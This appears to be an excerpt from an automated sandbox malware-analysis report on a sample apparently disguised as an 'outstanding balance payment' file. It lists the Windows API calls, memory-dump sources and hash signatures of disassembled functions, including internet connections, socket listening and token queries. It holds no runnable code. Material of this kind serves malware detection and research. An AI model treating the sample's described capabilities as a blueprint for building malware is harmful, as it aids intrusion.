                                                          • Instruction Fuzzy Hash: 0131F171900108AFDB11EFB9D8859EFBBFDEF54314B1084AAE819E7211DA759F058FA0
                                                          APIs
                                                            • Part of subcall function 00B7B34E: GetWindowLongW.USER32(?,000000EB), ref: 00B7B35F
                                                          • GetCursorPos.USER32(?), ref: 00BCF211
                                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00BDE4C0,?,?,?,?,?), ref: 00BCF226
                                                          • GetCursorPos.USER32(?), ref: 00BCF270
                                                          • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00BDE4C0,?,?,?), ref: 00BCF2A6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                          • String ID:
                                                          • API String ID: 2864067406-0
                                                          • Opcode ID: 6e5b348377ee55ed12a450aa3d10f52275acff6446f9af38a734ef208f9f15b6
                                                          • Instruction ID: aff6359b80f5b1b35ac0e3fba52de53c4e87133fb2005f0b195148306495faf7
                                                          • Opcode Fuzzy Hash: 6e5b348377ee55ed12a450aa3d10f52275acff6446f9af38a734ef208f9f15b6
                                                          • Instruction Fuzzy Hash: 22215E39600018AFCB259F94D898FFE7BF6EB49720F0880E9F9154B2A1D7719A51DB50
                                                          APIs
                                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00BB4358
                                                            • Part of subcall function 00BB43E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00BB4401
                                                            • Part of subcall function 00BB43E2: InternetCloseHandle.WININET(00000000), ref: 00BB449E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Internet$CloseConnectHandleOpen
                                                          • String ID:
                                                          • API String ID: 1463438336-0
                                                          • Opcode ID: 1d52dabccaa3d7b1b50f187b0656b25e1a5a0b57e3e224ddf93d92adf80ccb6f
                                                          • Instruction ID: 9550aa90060e89835ed96d405c66172e6c1276d0d059c96ef29ef3fa8a1d1d96
                                                          • Opcode Fuzzy Hash: 1d52dabccaa3d7b1b50f187b0656b25e1a5a0b57e3e224ddf93d92adf80ccb6f
                                                          • Instruction Fuzzy Hash: 6E218E35200605BBEB169F609C80FBBB7E9FB48710F18406ABA159B652DBF1982197A4
                                                          APIs
                                                          • GetWindowLongW.USER32(?,000000EC), ref: 00BC8AA6
                                                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00BC8AC0
                                                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00BC8ACE
                                                          • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00BC8ADC
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Window$Long$AttributesLayered
                                                          • String ID:
                                                          • API String ID: 2169480361-0
                                                          • Opcode ID: 79bacdcdd6596523f01f9277e02f1139f2b4db5ce3d488b10e4793b634134c8a
                                                          • Instruction ID: 2aa52525045436ab6e246b0dfe20099bc8781f353aa649fece535a7a2b315486
                                                          • Opcode Fuzzy Hash: 79bacdcdd6596523f01f9277e02f1139f2b4db5ce3d488b10e4793b634134c8a
                                                          • Instruction Fuzzy Hash: 6B118131305511AFE705AB18DC45FBA77E9EF95320F144199F916CB2E1CFB4AD108794
                                                          APIs
                                                          • select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 00BB8AE0
                                                          • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00BB8AF2
                                                          • accept.WSOCK32(00000000,00000000,00000000), ref: 00BB8AFF
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00BB8B16
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: ErrorLastacceptselect
                                                          • String ID:
                                                          • API String ID: 385091864-0
                                                          • Opcode ID: cca5ec6dbd3f9bf5d94af6ec3b78004b97cd936215218eff4597d49cc9d233d1
                                                          • Instruction ID: 5d4b889cb6e8d9bd626ea8661a8a7e0749245b36444a07b7e97e387acb8ef8a0
                                                          • Opcode Fuzzy Hash: cca5ec6dbd3f9bf5d94af6ec3b78004b97cd936215218eff4597d49cc9d233d1
                                                          • Instruction Fuzzy Hash: FE216671A001249FC7219F69C885ADE7BECEF5A350F0081A9F849DB251DBB4DE45CF90
                                                          APIs
                                                            • Part of subcall function 00BA1E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00BA0ABB,?,?,?,00BA187A,00000000,000000EF,00000119,?,?), ref: 00BA1E77
                                                            • Part of subcall function 00BA1E68: lstrcpyW.KERNEL32(00000000,?,?,00BA0ABB,?,?,?,00BA187A,00000000,000000EF,00000119,?,?,00000000), ref: 00BA1E9D
                                                            • Part of subcall function 00BA1E68: lstrcmpiW.KERNEL32(00000000,?,00BA0ABB,?,?,?,00BA187A,00000000,000000EF,00000119,?,?), ref: 00BA1ECE
                                                          • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00BA187A,00000000,000000EF,00000119,?,?,00000000), ref: 00BA0AD4
                                                          • lstrcpyW.KERNEL32(00000000,?,?,00BA187A,00000000,000000EF,00000119,?,?,00000000), ref: 00BA0AFA
                                                          • lstrcmpiW.KERNEL32(00000002,cdecl,?,00BA187A,00000000,000000EF,00000119,?,?,00000000), ref: 00BA0B2E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: lstrcmpilstrcpylstrlen
                                                          • String ID: cdecl
                                                          • API String ID: 4031866154-3896280584
                                                          • Opcode ID: 6f9ffd92447bf1df626bf2fdc320ace7f2d2e754bd74bb9c8dfd3d364581968b
                                                          • Instruction ID: 543d3676b81d7c15c7944d671f95ffe4b2b56cc3e05b03d4c65c74278db4ca95
                                                          • Opcode Fuzzy Hash: 6f9ffd92447bf1df626bf2fdc320ace7f2d2e754bd74bb9c8dfd3d364581968b
                                                          • Instruction Fuzzy Hash: 4F11E636214345AFDB25AF34DC45E7A77E9FF46310F8040AAF906CB250EB719851C7A1
                                                          APIs
                                                          • _free.LIBCMT ref: 00B92FB5
                                                            • Part of subcall function 00B8395C: __FF_MSGBANNER.LIBCMT ref: 00B83973
                                                            • Part of subcall function 00B8395C: __NMSG_WRITE.LIBCMT ref: 00B8397A
                                                            • Part of subcall function 00B8395C: RtlAllocateHeap.NTDLL(01670000,00000000,00000001,00000001,00000000,?,?,00B7F507,?,0000000E), ref: 00B8399F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: AllocateHeap_free
                                                          • String ID:
                                                          • API String ID: 614378929-0
                                                          • Opcode ID: b43dedbee789a6a2e94b9954e3f731670e3456b8668497f5a600b159d613865d
                                                          • Instruction ID: a05ebd67a631519378a088534af6fdbd8e437973c8aafc5315ff0db82cb46945
                                                          • Opcode Fuzzy Hash: b43dedbee789a6a2e94b9954e3f731670e3456b8668497f5a600b159d613865d
                                                          • Instruction Fuzzy Hash: 0C119132949212ABDF313F74AC8576A3BD8EF14764F3449B5F8499B161DE70C940DB90
                                                          APIs
                                                          • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00BA05AC
                                                          • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00BA05C7
                                                          • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00BA05DD
                                                          • FreeLibrary.KERNEL32(?), ref: 00BA0632
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                                          • String ID:
                                                          • API String ID: 3137044355-0
                                                          • Opcode ID: 26d85176f19782d46854954cf64790e829fbc2c285084747b6a4f55fade12bec
                                                          • Instruction ID: 429977e8c627f67895286860dc24054459d0e238156cc92fc44f37b21d795542
                                                          • Opcode Fuzzy Hash: 26d85176f19782d46854954cf64790e829fbc2c285084747b6a4f55fade12bec
                                                          • Instruction Fuzzy Hash: C521BE71904209EFDB20AF98EDC8ADABBF8EF41308F0084A9E51697050DBB1EA54DF51
                                                          APIs
                                                          • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00BA6733
                                                          • _memset.LIBCMT ref: 00BA6754
                                                          • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00BA67A6
                                                          • CloseHandle.KERNEL32(00000000), ref: 00BA67AF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: CloseControlCreateDeviceFileHandle_memset
                                                          • String ID:
                                                          • API String ID: 1157408455-0
                                                          • Opcode ID: 6c5ee6e06f56f309ca55fcaddb855294371718775d329d7dff738a66727679a8
                                                          • Instruction ID: c1eb08f913eaae3567d3bd037ef2f53f0e1cd5120e4eb22c87e3b309d4c65a2d
                                                          • Opcode Fuzzy Hash: 6c5ee6e06f56f309ca55fcaddb855294371718775d329d7dff738a66727679a8
                                                          • Instruction Fuzzy Hash: 62110AB19012287AE72067A5AC8DFABBBBCEF45764F1041DAF904E71D0D6744E80CB64
                                                          APIs
                                                            • Part of subcall function 00B9AA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00B9AA79
                                                            • Part of subcall function 00B9AA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00B9AA83
                                                            • Part of subcall function 00B9AA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00B9AA92
                                                            • Part of subcall function 00B9AA62: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00B9AA99
                                                            • Part of subcall function 00B9AA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00B9AAAF
                                                          • GetLengthSid.ADVAPI32(?,00000000,00B9ADE4,?,?), ref: 00B9B21B
                                                          • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00B9B227
                                                          • HeapAlloc.KERNEL32(00000000), ref: 00B9B22E
                                                          • CopySid.ADVAPI32(?,00000000,?), ref: 00B9B247
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
                                                          • String ID:
                                                          • API String ID: 4217664535-0
                                                          • Opcode ID: 8d92310b62e98384bd69f9475265374a759d0471238905386ad71e36874fbeea
                                                          • Instruction ID: 3d6d5bba76dc8193eb5922ffd8d72092f58f6b3fb88ca7394ae93ccce1fcc713
                                                          • Opcode Fuzzy Hash: 8d92310b62e98384bd69f9475265374a759d0471238905386ad71e36874fbeea
                                                          • Instruction Fuzzy Hash: 8D11C171A00205EFCF149F94ED94EAEBBE9EF85304F1480BDE9429B210D7B1AE44CB10
                                                          APIs
                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00B9B498
                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00B9B4AA
                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00B9B4C0
                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00B9B4DB
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID:
                                                          • API String ID: 3850602802-0
                                                          • Opcode ID: debb5b297ca440cfb205bb922d56fdd35f3c53c78aea67b9fc9e8c1b906827a8
                                                          • Instruction ID: 9994aba2ba258158f1ef2fb2b9c20ae792b4a5f289387f8744a6db23b8a9fc54
                                                          • Opcode Fuzzy Hash: debb5b297ca440cfb205bb922d56fdd35f3c53c78aea67b9fc9e8c1b906827a8
                                                          • Instruction Fuzzy Hash: 4011367A900218BFDF11DBA8C981E9DBBB4FB08700F2040A1E604A7294D771AE10EB94
                                                          APIs
                                                            • Part of subcall function 00B7B34E: GetWindowLongW.USER32(?,000000EB), ref: 00B7B35F
                                                          • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00B7B5A5
                                                          • GetClientRect.USER32(?,?), ref: 00BDE69A
                                                          • GetCursorPos.USER32(?), ref: 00BDE6A4
                                                          • ScreenToClient.USER32(?,?), ref: 00BDE6AF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Client$CursorLongProcRectScreenWindow
                                                          • String ID:
                                                          • API String ID: 4127811313-0
                                                          • Opcode ID: 0cbec2a0aed429e639fc40ae408239d9ea6857d251e64c1394f449d653db7f21
                                                          • Instruction ID: fbcc736864be27a211acc514c5dc3d1e7bac0cc358866918f7fedc94a4f24c83
                                                          • Opcode Fuzzy Hash: 0cbec2a0aed429e639fc40ae408239d9ea6857d251e64c1394f449d653db7f21
                                                          • Instruction Fuzzy Hash: 20112571900029BFCB14AF94D885EAE7BF8EB18304F004496F925AB140E770AA81CBA1
                                                          APIs
                                                          • GetCurrentThreadId.KERNEL32 ref: 00BA7352
                                                          • MessageBoxW.USER32(?,?,?,?), ref: 00BA7385
                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00BA739B
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00BA73A2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                          • String ID:
                                                          • API String ID: 2880819207-0
                                                          • Opcode ID: 61505acd2890f0188bb706419ef683a90b3e916fd27c1c597310fa2934fd43f1
                                                          • Instruction ID: ee3fc413f4421b93a56f53a715e491abb4c1d3cd232209abed5376475049ad99
                                                          • Opcode Fuzzy Hash: 61505acd2890f0188bb706419ef683a90b3e916fd27c1c597310fa2934fd43f1
                                                          • Instruction Fuzzy Hash: ED110872A0C244EFCB019B68DC45B9E7BEDDB45310F144395F921E32A1DAB08D0187A5
                                                          APIs
                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00B7D1BA
                                                          • GetStockObject.GDI32(00000011), ref: 00B7D1CE
                                                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 00B7D1D8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: CreateMessageObjectSendStockWindow
                                                          • String ID:
                                                          • API String ID: 3970641297-0
                                                          • Opcode ID: 7cadb5039f92e681a1e78af81e5eb5f74aa5b76e00dcf17ead0810f72b64f7d7
                                                          • Instruction ID: 6bb754cfbf1c85bdbd8e8f249b7df9f96931325396a2a18638e9a48423da9cfb
                                                          • Opcode Fuzzy Hash: 7cadb5039f92e681a1e78af81e5eb5f74aa5b76e00dcf17ead0810f72b64f7d7
                                                          • Instruction Fuzzy Hash: 0211C072101549BFEF124F90DC90EEABBB9FF083A5F448146FA2966150CB71DC61EBA0
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                          • String ID:
                                                          • API String ID: 3016257755-0
                                                          • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                          • Instruction ID: 7040dacb7870cfba3b4d7fa9deac4f1bec5bc77212e0008066222bbad6cc025f
                                                          • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                          • Instruction Fuzzy Hash: A1014B3204054EBBCF275E94DC51CEE3FA2FB18354B5984A5FE1859135D336CAB2AB81
                                                          APIs
                                                            • Part of subcall function 00B87A0D: __getptd_noexit.LIBCMT ref: 00B87A0E
                                                          • __lock.LIBCMT ref: 00B8748F
                                                          • InterlockedDecrement.KERNEL32(?), ref: 00B874AC
                                                          • _free.LIBCMT ref: 00B874BF
                                                          • InterlockedIncrement.KERNEL32(016828B8), ref: 00B874D7
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                          • String ID:
                                                          • API String ID: 2704283638-0
                                                          • Opcode ID: 7c149862d37b1edea4a29d7b755af6f6710eeb4bb734f56add75b90a78a033f0
                                                          • Instruction ID: effb8123f6923aa4d102eb4e8118069218fa856e99f744d378eab56b45f69034
                                                          • Opcode Fuzzy Hash: 7c149862d37b1edea4a29d7b755af6f6710eeb4bb734f56add75b90a78a033f0
                                                          • Instruction Fuzzy Hash: F7015B32A8A6219BD712BF64944979DBBE0BF05729F288085F824677B0CF34D941CFD6
                                                          APIs
                                                          • __lock.LIBCMT ref: 00B87AD8
                                                            • Part of subcall function 00B87CF4: __mtinitlocknum.LIBCMT ref: 00B87D06
                                                            • Part of subcall function 00B87CF4: EnterCriticalSection.KERNEL32(00000000,?,00B87ADD,0000000D), ref: 00B87D1F
                                                          • InterlockedIncrement.KERNEL32(?), ref: 00B87AE5
                                                          • __lock.LIBCMT ref: 00B87AF9
                                                          • ___addlocaleref.LIBCMT ref: 00B87B17
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
